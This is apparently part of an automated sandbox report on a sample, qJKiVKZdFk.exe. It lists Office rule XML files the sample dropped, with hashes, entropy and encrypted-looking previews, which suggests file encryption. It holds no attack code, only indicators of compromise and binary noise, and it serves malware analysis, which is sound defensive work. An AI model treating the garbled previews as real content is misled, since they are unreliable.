                                                                                                                                      Preview:<?xml..vFnz8........r.I..EY'..J[V...+,.uI%}......1m..U2@ry.}y....y;.'aN..;W...2..]40......d..nF,)......IkI.........'../.c..W.L.a'j...w.h>...Sx.X"x.....Z.......kX..J.LplP..YK..X..]9.}x.....X...G.N....{B......e<b.Q..N!..\...Y.....C..P.....E..9V..... ..F.q...go-.....W`......27...q.....6q.,....+...S.........XM...@.*z.c+..`X`:.L&..[..7.i.h......,.........'.\<.}..8..B......{.e...Y1a/.....J.*.~.;../7i....3....$.s...^.0h{A./h.%.g..o.K....c..........u.f....v.S.\..xz......5y].C.y.........V....LL.]..kZ6.QK.2.e2(D][@......T..3.%........Ki1_....Gi...n.@.T6.SP...i......0B..........uJ.%.v...<.....q....Dp}.~~...!...NC.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170073v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):931
                                                                                                                                      Entropy (8bit):7.749207112182504
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:X/VdQ4OtcTv+UPKFTq8h+Ru5VNcIowQfRGxKHka/BDoTe/7q8Kh8HMvd2Ly9wnuV:P4cDzPKtEU/owxupDoTuS2a1bD
                                                                                                                                      MD5:C0AE56CF80342C4636083D85F78C72F3
                                                                                                                                      SHA1:0DDFF8E25C455B5A1780B0EE1B4F637C3B6D33E2
                                                                                                                                      SHA-256:453F4A8BDF024F57750D8CA7D9EA17741113CE3B289A5F11C791C4B32860BB70
                                                                                                                                      SHA-512:E0487819467160F72A796A17B26A99AD44D2E0B18F403900134ABB8591E5D0E2FF8A578EE98E44EE88D34E10542EE6B8D85ACB52D320D505DB9B1A59520EC711
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.ZG...,..M./..dh}3.......8..'c...2T..E......*...v8#./..Y.,...@.D...xf..<....L.......!m.(,......'f...eg.I..2....b..t....Ah..w...S....w".s....!...|.<.?...8..D.D^.p...<.!.......L2....Z|vZ.R..b..}.q.E.r.~pjZ.r...@;w..T&...m/..qrp.v!...*..,.+..fZP....@...8~I...y?...........i.K...0....^F0..)U....j(.T>.L.ZYS.........p&.\..K.}x..Fd.Br........0.KuA(.'...6R.9....!1.~.n...9..F.............?j..xj..-..... >.2.G..[L\.>.o...t.....d.O...?3..n.o....bn> O.g..Pw..%z.k..~.+....i..z...%x..-?:.c..G..,..Du..N....<..1..D|....C....F..@.......\..X..0.g....Mj.Q..........~...e.q..R....g.L@.Z...C....Y.M.,...|..e6....\..'..o...47C..X.T.c`d.A...........l.._nk.#.].x...-1 ..C..o.1.XB=pC.>.6e5....8=.....v0.....i..k...:+F..6;KB.>._.-.:..v.J..,..T.!d....4 O..o.;y=.9&f.L.@{o04..B,.....UB.P...`$.?.x..H...X4.'.Z.X.d:.J05....8w.S....5...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170074v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):923
                                                                                                                                      Entropy (8bit):7.728882598494329
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:naPFjCmcKVFQ0z115Zm5fLXvLNbgp+a0d6Pq5EVSdbD:XmYJGBkwq5EVSdD
                                                                                                                                      MD5:DCDEB895FCB96CB36B24AF2565991A15
                                                                                                                                      SHA1:127DB4D8E454E3ABA9A81B4F930363715645745C
                                                                                                                                      SHA-256:2A42F2CB363793F7C230A82096D450441AD678E58ECEBA1CA49923E5D0CDE9A4
                                                                                                                                      SHA-512:BC35E299135D3C6398F4CDC14B4D306F28A08149785C9BB86F328DCF4B5620E12493D727DDBB5E634AEDADF1F136EB72480A11D23FD909EE822973B51A78E3CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...`"G....Yj.m..,...L....?k<...+. .SZ;.?.L...`AR...4.q..^.f..c..M1./.c.:o..M.l..K..?.X.......B..+......y.-.#&.Qv...+....L..uA......[Zd...9.0\.v.I..Se.u.S..<..}.\Z.....-.Di........?V.F..u.4..?.5.4%U'....cl.XK.f....v...j..qP_.n....4..3..zC.....}..i.TJ..;8V.E.. ."...-..t........h.Q?..O.t%v..|...(.....NF..k82C..\..{/r?2.Wa.....E$rz#[.W{..!...j..Wo...Q.<A......%....7....d.Zt..).8.......+.t/..Rd#...d..t..Gdg..o+v...O.....e>S..=.I..{.....f\[...+..>....TWK..3./d..q...F.Q6b<4.8.J... ........lZ..0.f.I#;...bx2.13.H.....g...T&jb.../..[ ._.?X...9.....@.Pw.v.....M[W...u..n\c1.?.4c.....P.d.P....:........w..8..<_.rv7w.cAZ.}....H:.L=.+u:NP.A.K.EC...^..;VK...j....zA..!.."....".F?m....{T...v@..F.....T.A..9..5...;.....u .@|G.{f.V:.3....m.2+..=.c...%...9M.T.'b.e3...........O.#..E..q%-...o.........~.....].uM$..=D.5.7{tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170075v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1267
                                                                                                                                      Entropy (8bit):7.828538272429731
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:I4odUXd8maX0ZYHKxphDo6Y/WbZpBXwPi2rRjaRHD+ECzHS6S9c3CfbD:ITgaX0yCjW/WbZpBXwRAHDtuS6UcUD
                                                                                                                                      MD5:D5676B6EE9337B1C661E859CADE90593
                                                                                                                                      SHA1:692D8A8DB7C11356FA583598087C10E0877D6D22
                                                                                                                                      SHA-256:A75C0A49459C9EFE65682042A98C0CB0E8D95FC5D560B248978D2B1EDEDF0937
                                                                                                                                      SHA-512:8E0EA58464A2E268CF29C9D7A19FD1F2BBF59A3F7EDB7D99674E294BCD070639B464A54833C99926D3C384CF98872996FB84A3C35C80638C9165AEEA19C76742
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...,.j......$.dj..y-.H '...A.(.Z6r[L.....J......#L!X.-d.^H..E....K.O..\)Z...L..q.x..a.sC.y..-..+.....Y$.Y+....{f..._.....&.*....I........OU..TI.'I.8....h.b..T..&.....8'.&b.3U7..0..^.).L..R^0.3).%..!.._R.5.m5............9..v... ...-......8.....cx.W.C..=......#A.X...x...!...Q..~*.T;h......L.....WN-.B5]"6.&.O$m....n.1.CC.t.&..B.8N.2.pGU..E}u.....k....1p;).>.B6r.;u.....A.x..].2...:....)9g........7{.|s./...\.......e:&.'<..m...ACj]..<...d<..3.{...08|7.........M2g....a.|..k..{V>.a9..nj.....<..4.Bi.3@7...=.:.(l..=`.?..)?(.[S...%.......B(I]3.&t...o....f....u.t..Q.V".7....G.0.A.Z.my..L`g..-....[e.8....D...k2..1.|-.A~=..8.X`...e2.......0..J..o.T8....A.cYj.......F..0..pK.[....A...N..d%.k..b..0I...]*....=....'.$...D'.BdZ..._...C....C.|.i..`...)..G..jC....HJ@.).E.*w.jkAe.O.c./....pd.n.......;.:...T...6ynV.8O...}..b.B.....I.4zL....8.(...tV..B.~.A`*bM.iPrf_..z.I....\...<.0.8.!v.p.6.....j.h%.@.....y.M.BQy..a#...<......J4.u.....I:4..+....7,..v._...$..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170076v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):719
                                                                                                                                      Entropy (8bit):7.675896840339287
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DzXg4BX2fh56qgIZnuVkUTJe1NoupShMaAmWRHNZ5C/DnxD1pb/Xx+ukIcii9a:DzXg4Bmp5Fuiv1ghMaALtZc/rxHnbD
                                                                                                                                      MD5:1A39008DD6930075A44818AAC184884B
                                                                                                                                      SHA1:4A63411C98B2C21720B470A5FB9A781A33AE061B
                                                                                                                                      SHA-256:C7E7FFFA2070393A418404390D7984A92B3A8B3E602F058449FC54E9F2EFDC5B
                                                                                                                                      SHA-512:B844B67544F294079CB1656A3D9396E084688FA569F02435910EF4619F9AA4FBE02FBD10D14CF8E132F936C9A0ABC9A96744433E73A4E11BA92D8B11B55F6D2E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml,V.........j..i...|. O..R...^......jR...B..9OnT....C.#..B..<{.B._......S$..L.....-9J.n..q.e..Jv..p.B.....W....4...X....P.+....SBkQ;.06.r..8.H4"a.........G....@W..D...?4.k.!<.vo._.]4_..v~...l.... .T..h.tEMX....'f.n.<...H8.p.....a.LN:.4.....P.@.Q.-T..../3.*u.}Cq]..f.B.,.Tp.`ox....P.7..k..5.&..Q,.#.@...uR......3..e.?Am...@.wl..4....?.0Z.kM?..";..aR...O.tf|.;n..k.#+.iF{V.B_....wRg.O"J..z..%.:.........]%..y.,|E...J..T..1H.%....i......~...WI....m.c@..kE.t.^'....K.U.....:... t.:.v...<............cC...Q...[-.".N.Q.4s|....K.....7..6..b.i4....q.8..y..4.Z.p7.@_........=.$s.@.....uE..2.i...Qo......3..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170077v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):723
                                                                                                                                      Entropy (8bit):7.74493219254169
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zs4yxOjb6IzvCVkTQE4Cpwr1tAMnFMXnxFdx4nWqMO2n6HdHD1Jj/6G9cTVhhPx1:ExOjeIrCeVy1tA+FUnvdqnWq326Hdjfc
                                                                                                                                      MD5:C0CFECCCCA60ACEF935D8621F1E7CCF7
                                                                                                                                      SHA1:0F0E201BC57FFE9E87E2EE04FAB1770B767228E8
                                                                                                                                      SHA-256:72C57A7A6FF986DC94ACBF830FD67C607559513BA421EA4224AD1E3E54390EED
                                                                                                                                      SHA-512:F8D0BF406A54978C48BE2F1D6D84354823066BBDB446C046301CECD9D0BDC3D2BF16A624E7B3CB1381A8B8187C6A3F0C9204C0FA151408A21AA2E63712910925
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.S.....jh..D.n..2..!"..!wa`.....k..;..........1.?.u...H7.$.f9.1...I.@...q)..... d..Ea.....Z..)>..N.....;E =....43.0..K.....OAj<.V.A...g.......5.u....'..Z..;>.D/..j9~[.F6$M.w..%,$..eD.R.v..T....hJ.=....|x0S}.....z.lj.pK.(a.0.o.$.V....h...b.(\..4g.....d.O...g!=...sGd%aS#z...l.5I^.Z.oR...7B..D0."Q....X.i3...y.(l.s...H}p^v......"...@.m3...n...[..........:.|...R.....o..do.2./.....|.;."........./..A.h..3-x.......V.....g..Y^y0....../F.CR.....:..y.Q.. ...A..|.w..:...2.[.....ko..U.L5.$I....1.;..W.....W.|_..`P.{...&d....G...Kx.m......L.w9..7...!8..D...G_6.~[E>@.d.B]..-F*...q.....j..r=$.{...m&e'0.c.\../yntntp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170078v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):817
                                                                                                                                      Entropy (8bit):7.725791814160198
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:fuLBqwUCG73wk5izlxmefsZ7Wpu8Yx89PGMSaI+aLA1F5YaF8PukIcii9a:f2Bqt5ihxql38Yx8IaXMEWUbD
                                                                                                                                      MD5:C779C976C221472E7EDE41799258623A
                                                                                                                                      SHA1:B1A9AC3D07E2DD3C63F552D930A4F08B547812E4
                                                                                                                                      SHA-256:55A9BB075D0F1589BE8AB3EE1002AD23875583463673875D4A0F144F6F9ED01F
                                                                                                                                      SHA-512:A0E32E0AE44034001605FCBC5C468A6A78CF3B9140B28456CBDF0FAC5C3BD5F7BADE772EEB73BACF703AB165C05A0494A908E14C45FF32A66AA56EB489F29244
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.b....l.&.E.e5.m.=&..<..NZa.".Y.].....Q...kh....0..L.[..M.6s.0.......[zQa...3...K...1.m..8f<.1..::v..1O...,..]g........<u.....$..>:...s.U...0.>....Z]....%....q.......Y...~We..:....J.;[B.G.9(Q.].w..W..V..>.......P...".....[6.j.h...v.K...'@w.....<.G...m...0![...|.h....j..2..._.5jW..l../...p.Y.8 ..l..Ph..).-4@....... ... ..zh.:=.....~...qi+...Z.Y.. Z.'.-+.?.>...?.?f!....`...h&.+6L...k...v~....f..#*....&Y..9.7..M......JN]E.}.U.h..RNw..uLYp.a...\f..(..<.CB.C.!.^......Q>.sz..D..g>,..W[....+.]T..X........J....oD.....9J..T)..)_n..n].....]Z._ 0._6..<.....w....2.b.o..........nQf.@.........}8.1r.r...s...m...f..}...(.%...k.R....a..r..2..>..L/p.........U8......2...<t.2....O...7..!.#rbqa.(./;..#..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170080v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):719
                                                                                                                                      Entropy (8bit):7.687670140253231
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:9Sxu8sppAjYNNPOfG7CvV72IGg6OkytoaWtLQZV7jKv8fsMvzy+WVnukIcii9a:9y3sf2YSVvRug6YtKtLMVyv0v6MbD
                                                                                                                                      MD5:8F1AA76E95F4F47811326D9926782741
                                                                                                                                      SHA1:D45D3B7C84CBB76F45CA2BDAEC67C580E7F9F823
                                                                                                                                      SHA-256:FF54DE9F6B89CA0557C1D218F42CD4086098FA1813A4E73A6C1B2DF42F1F1A1E
                                                                                                                                      SHA-512:E4D2DC86CD96ADEA83AF8E4BCFD47518308EFF7E104D65F081CBD678A603649DD5549EEE4E91B08FFE752B4B29A14972ABC2D7BCF0022611DE58E99F2F213DE6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlk....8..>.....!S....6oY.'m!.s..{)..o.A=..D.H........U...F.......:...`.3~../.].Qp....;..~..V4.&A.S7.b.N ..pl...#..!x.pC../m....?sKs........{r.....:..."9:./&.....ae5.t......Q'k...w..K)AG1p.y'e..8......#..?......t?.5...$u...*....2.-[.I..W..f.....n4...).....XV.....Z.......b.S^.*.h.8M.!.AW...-cgLP..g.....X..*...{.J...|.=.Q.7>."..mbs..2*......N........'.3#.T...`!....7e..S@....Mk4..@+..xBN=.........V...d...EB*.jT{0yt1...z%8.'!.Z....P..yO..VH..:.Z:..^..c_V...f.BI.~./.&2.b.K.7/..XeN......X.H.p.&.../r#.g1B...:..V@i0.I.m......D.p@.l.>.qg.;..B..bxCYD.....fElt.c...V..hWB....r.|.(!....^N../..9.E.......#....,\tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170081v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):881
                                                                                                                                      Entropy (8bit):7.765786994141335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IJYdbldGthu5FXCb0lRIgZaBThjiyrEbD:PRruaNCuWgZaHjMD
                                                                                                                                      MD5:0D61D50848C19B7CF45FA557E14188BC
                                                                                                                                      SHA1:CFE4697676D9D28F962D122C91D6ADEBC950D69E
                                                                                                                                      SHA-256:6F850A7F6F916B32B33883D4567921EF2C7AF8B0C41DCA829C8AA950CD7585FC
                                                                                                                                      SHA-512:1B93F8B2407B08FC58B37B8FF774F0D4F9163065B9DD7DF0393DC2EE997C64FA7AD2AD82D643ABD1F5E71E58B4C8AC3228DA979E6C451EEFC65326207FDE8D41
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlu)..........p.HA..s.......0....'ey...l...~..b.$.7..K.+Z..IQcd....I........C..y.:z..i;#..}.q:.X...b7.a...Uo|.'....S....O.m.It..~.M...F.....\.%v.^....z.^.V.p5t.%......?....>(..k.*.o..r..W.#..Ta..o.|..X..Y..pY>...]..6!......q.TF.9."$.Sy..@.TB.k..S.r.o....~s6.x..c..&.I..?.........r.y.0*.m.[b"F.k.....{r..V......o..... ..n.1.|"...$..{....:........Q..ap..1|....~1D......B.....^Q.X.......8d.4.......,.......t...'..J....../H:...i...S."Ll).....h...Qb.C.Z.S..w}......K.........eL.6y....b...Y...Q)l.w G..}....b..K.Y.gI..pE..[o.S.@....A .Je.{n..U.E......)h..C$....Yb_.f.Q...g7.C;.V.#@...9....%(w@...1W....?.{.O. .9......7.+.mp..jl?A ...D.^...|..O...2.....(d.........3e.:...2.. ....4.....?(.GEg}...F.;.....]..'i..W...a$<.|...q...{...ZG.K...E.TU..Ez.....B.8;0.:.s/...~.....Atp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170082v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):737
                                                                                                                                      Entropy (8bit):7.722351732461919
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:LRC/jG9fxjQr7URNnMtWfVnWyAWAxslIeXtgRmJcq5G0oXOo9rkukIcii9a:1C/yhC7UrUWfhy9slIeGRmJjc+sbD
                                                                                                                                      MD5:400EC8D54ACB86645C22307E5C5FBF9E
                                                                                                                                      SHA1:9F47B6DDDA8B1B7B32295DC477F579D88935C685
                                                                                                                                      SHA-256:F98E1CCCEC960D17661ABE82019D933C65AE8047D6FB2FE2580F7F99CEE47FE6
                                                                                                                                      SHA-512:3FAD44A9F35991953D617EFC389A22D97BE89A102425E6D5C90A8450751255717B8249400B195EDABC0FDC029C9B136F0CAC9C0674D9487A9544F310F699953E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..gMi.....MJ&......OE..!.......$./.d...W.#.^\..<F...o.6......3.5............R...B....-6...+.8..y..qY.:.0=/......J../1...I.q@..V}.-{......CQ....:D..~^...0.i..0....f'Z9..6y.0..P+p.N..E.UWG*.qp.zJ...Y.Q.A->..T}..A7.7....ob*.........h..c.........0._...7//.`.^..@.*..o.E..YBI.-.]....N.H..].&...6..q.....G..F(X3..\..b...&..u.-.^.$%..o.."...8.nm..y9.k..!.8.......8.....igz'.....?.{.(.<...f\.G..7}..T..b@..&~.41fk.ies5v7D..!.. ..d..W8u@.7.N....>....M.......).....d...`k..r..M.f..z?.....m....X..d..L.-y.n.......UKs.k..[..(..X!..).. i..aP,;.$.M k...?)....P..O..f. ....!'r....Hwm[...H2j.5..|....=..."0....m..}..b......i..&a...]tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170083v6.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1421
                                                                                                                                      Entropy (8bit):7.825695089211117
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:asQ5/kqZ/mB7kqyj5IN6IZMz9aoc9fcauxIOsQxXrghSa7hhUbD:q8A/mlkqyj5xIyz9anucQx7Yj+D
                                                                                                                                      MD5:4BEA92758BE66A2A785EFA9F783ED2B4
                                                                                                                                      SHA1:05D355EF432036A71A5F729DB037354CD2FCAFC9
                                                                                                                                      SHA-256:E09FAD377F26FF48FA4ADF42DE6F4B26BC39EFA2E164BA60E2F2BD64A561AB95
                                                                                                                                      SHA-512:EA191A17290D390913CC72191EA5A07004C7F57F483E16BFCFDB620E8BC46D535E1E21C68073E6AD8C7A0AF752692633A8CB3BF35F0BED8C820F25E9819C5CB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..gdxE..-h......P...Z.h.............u..-........b...3k..2....y.D.$n.Gt2.q...@..:..*E....Um.d.u.E..).Jp.D.J..v..'N..n5~...^.8-v.p.....,..K..v/....m..F. ... >*...Ua..;.t*p[@.......`.CH. .U~.@...(..L.`...:......T.Q.8.....Ce..]*.=.7...,......Du.3..U.u...-..(.`.r.6....C..&Nw ....N...M..6.:.8.....C....ng...M..j.*...aT...vmx..x*G..h...HDn....l3...p....R#WIl.Y.....f...a.'.-l..@...X.Y.;..cZ.%M.... N5..@...Zl..%.X$B.Gv=R4.T.rp.W....Lw.......$.*..^l...@G..D.W6.0}..\T..R^h.hA...e.r..s...Y\.hP:..n%s..=..t.x..CwGp...~AXm.G..x(...#67.gE...;...Bq....N.D.....a__)..)l9.%.=...T.D..c6..W..-.*.)@.....)[Fu...|..`...o.GFf<...qe.'xt@..].R......p......U......v.[S.....*Y... N..?.@..$.[...y..8P.U.:.|...(..}..y.....u..b......o.z....c.yT.]....&..,.d....*..E......c...J........"..V.....n......L.....B@.7[H.0.,..oV'.....DR1E.....a......M...S.\*........a...B.F@....2..{....P.....i!*|D.0.....~P.9.....T..d..wa....U..../p...T. x!5.2v<...@'.C..xpp

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170086v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1171
                                                                                                                                      Entropy (8bit):7.834264327733594
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:VytAJCXgmJ1wevmyLKMgyGAIZevkFEiB6qJtBqPmPVOPbD:6AJCXT1vmyNBUk8fguED
                                                                                                                                      MD5:8C751CE17FDA4B7F600CD591198E5165
                                                                                                                                      SHA1:815D6AEF8EA9E4A917FC638F6E34D19F9BE18167
                                                                                                                                      SHA-256:ED612E7361E66EF28416D724918A59C6432DAFBE116D1391DAE741C04E3CA2C2
                                                                                                                                      SHA-512:55847554FF769D9C13779F434481D67615AA801B2A5EB1B288EBCFEAFB53FF760114713193E21114C19B236CE1EB9CE6179D778DCF553FE02A0CD4E88EC960BB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...OmA3..5...).[K/.d.#v.....vH...kq..........$m3._7=.~..'M.U`G.VN...( .t4......r..m..Yu...}..=.e....B.q....4.(...U}.'.G..=...b.\..h.|.._!.S.t............`...V...p.Z*...$....7jy..g...FB..P...8...j...T..^..L...Y..?.:.'z.....6n./.J@dI;@....L..)].{..H.g..(...=.TW<f?.\..g6.w..........n...kku....MVr....)5....W...?...0........Mh....bs..H.....WC./S...0lz..!.x..:....C.D...UC9..-...W....f^..M;]...6..~.DD.VJ..<jc.]u.......(#[U%..o.O*L)....>`.....h.N..d....%..._+..v..>"l...D2n.{..?.'1z.lnX1..z.k.Y..)K.&..............v..n......1..N"!..X........lM..f......6PS........L....n...g.... ..t`..w...*Y+....vm...Q.S.Ju..s'`.8L.\.....A.N...H.I.zvX..Hm.4 .....)Mk.q..1...C..b1.4X.a..:...=..1.M?-..t...&.e.p.L...[k..u..........Jo.L[D.1......W..9V._i..n.X|.....C.n.vH6v...>......#.Xh..PZT.$..3.o+.D!....T;R@.1a..w.......p(2/.......+..:f.,....0M..c.D.r...M~...<....'_XO~..m.P%D.\.....&.....~..c..~...:)Z....%}... *....P.I..E.DO./..6..#.d.k.zOX.C#.a.W.B...L...!

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170087v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1176
                                                                                                                                      Entropy (8bit):7.787792014384699
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/EX5nqlpAZicxFwkM2KXpZ7vIMXTJfhYfxX5WtmdzgFjAKDrHJfvobD:/MApMrwhpiG7YZXctmd8AKBvyD
                                                                                                                                      MD5:F95CA506C0ED5AC2B55B55E162AB1D8C
                                                                                                                                      SHA1:6EA6002466571913DCF2D245DFCB645FEB753051
                                                                                                                                      SHA-256:A4A18DA5F50E39792CCBB9052DE606C33E39108EF7F261B7B0C3D1E980AE67E6
                                                                                                                                      SHA-512:701A7B60495C384016B894FC553ADAC524D728787C025B99A1296F792F62C2AD48F8C639B7970F2FF552FDCC081CAE41017D4BD22C4551C4804EDA1FEAB185FD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....(.B.4F.CoU...R.BH1..sE/E..2..1+_%.=1i.f...9......-............~.....%.%9.6dN}......e......x<.6.a$.....Y9...Hj8n..N.....\4.c.?.d..A......;...%t.#W'5...{..7.;pG.8ms.>5.....fm.c.o4.hR..x...=...4j......6.Xv.B..."r+.LPX#.W.b...${.......e.}N}.|i..Ng..-..?....}....-.9@. .J.;.\.g.....4.j.oKk$C..(@Qy..Y........./.....F>.Z:...;....cin.q.A..._.eE..S..X.W.y.D......<.d.F.=b..:.$.R3o*r.A.....s....gu.zn...+.>.....Z.t6J.M)..'...2.-o.../............hF@..b.....N.*+W......I8......w.\....R.+.....M..&.Z..L$$..b7...C"g...../... ...;2..5..S..z1......h....z?.$..[..T.4...).7wk!.#V`.tK.2.r2v..=.;K...I..1...HU.H.R.4+..$.."N.Ty.>|....n.J\...5A*........._.......2.>~..2....8. .._..i.bD*..=.yV....r..E..X..........I.}mA.OJv.-..y....W..h.e.3`.n2G-oG..X.<IoX... ..?+;.j.D. /.......N..G..9.T_.".#.;...T..'......Q}.]n.!5W..N......v..roB.A...*,...G+......a..i.....uB..E....Z....SP...c.6^..F.(.''...f.XA..1H..9...S...d. ."....gvx_DP......."Z...X.F0:.#g..Em...m+}..1.\...SU..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170088v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1155
                                                                                                                                      Entropy (8bit):7.823987708292214
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:o+A2eavI4r2GlH2lw1JqneEln0JfHynBjr+9+PbD:dvFr2GslWKQUD
                                                                                                                                      MD5:AA84AA7E65C33CA0F83C51B95BC8A48F
                                                                                                                                      SHA1:F7975D13F23C672AD72F6B237E9B40490C541192
                                                                                                                                      SHA-256:67466787B0C9C583C7C7346F06074BB4ED0B3E23B63BD90F6C4E06E7C3F469B1
                                                                                                                                      SHA-512:2CBAAD91F891A92BD69A1DDBBAAA56D1644156E304C24384E8DAA52E55CD4013D7B3B1F51A3D509326C8E08E04886466305EB80D60A8726FC4CDF4C62F4C73E4
                                                                                                                                      Malicious:false
